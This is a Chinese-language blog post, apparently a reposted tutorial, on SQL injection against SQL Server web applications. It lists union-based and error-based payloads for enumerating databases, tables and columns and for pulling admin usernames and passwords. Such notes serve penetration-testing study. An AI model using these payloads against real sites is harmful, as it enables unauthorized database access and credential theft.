暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

sqlserver简单注入-联合注入-报错注入

老徐今天也很棒 2021-06-28
2337

sqlserver 经常与 asp aspx一起使用

操作系统大多是 win2012 win2018

数据库版本 sql2008 sql2012

sqlserver 三个权限级别

  • sa权限:数据库操作,文件管理,命令执行,注册表读取等,最高权限

  • db权限:文件管理,数据库操作等

  • public权限:数据库操作等

注释符

--空格   单行注释

/**/ 多行注释

判断注入

' 单引号 是否报错

and 1=1   and 1=2   页面是否相同

判断列数

order by

联合注入

sqlserver对数据类型比较严谨

union select 1,2,3

表明,数据类型不全是int型,逐步调试

一般来说第一列都是id,对应的就是int型
union select 1,'2',3
union select 1,'2','3'

也可以通过  null  来查看

查询系统信息

db_name()  数据库名
@@version  版本信息
User_name()  当前用户
host_name()  计算机名称

查询数据

union select 1,username,password from admin

如果字段或者表名不存在,则会报错

报错注入

查询系统信息

and @@version>0
and user_name()>0
and db_name()>0
......

@@version是字符串,0是整数型;利用mssql在转换类型的时候出错,会提示信息

爆库

and (select top 1 name from master..sysdatabases)>0
查询所有数据库名中的第一个

查询所有数据库名,除了master
and (select top 1 name from master..sysdatabases where name not in ('master'))>0

查询所有数据库名,除了master,iNethinkCMS
and (select top 1 name from master..sysdatabases where name not in ('master','iNethinkCMS'))>0

爆表

查询指定库中的表名的第一个
and (select top 1 name from master.sys.all_objects where type='u' and is_ms_shipped=0)>0

and (select top 1 name from MYDB.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('cmd','test_tmp'))>0

爆列

查询指定库指定表中的列名
and (select top 1 column_name from mydb.information_schema.columns where table_name='admin')>0

爆数据

爆用户名
and (select top 1 username from admin)>0

如果再也没有可爆的用户名,页面会显示正常
and (select top 1 username from admin where username not in ('admin'))>0


文章转载自老徐今天也很棒,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论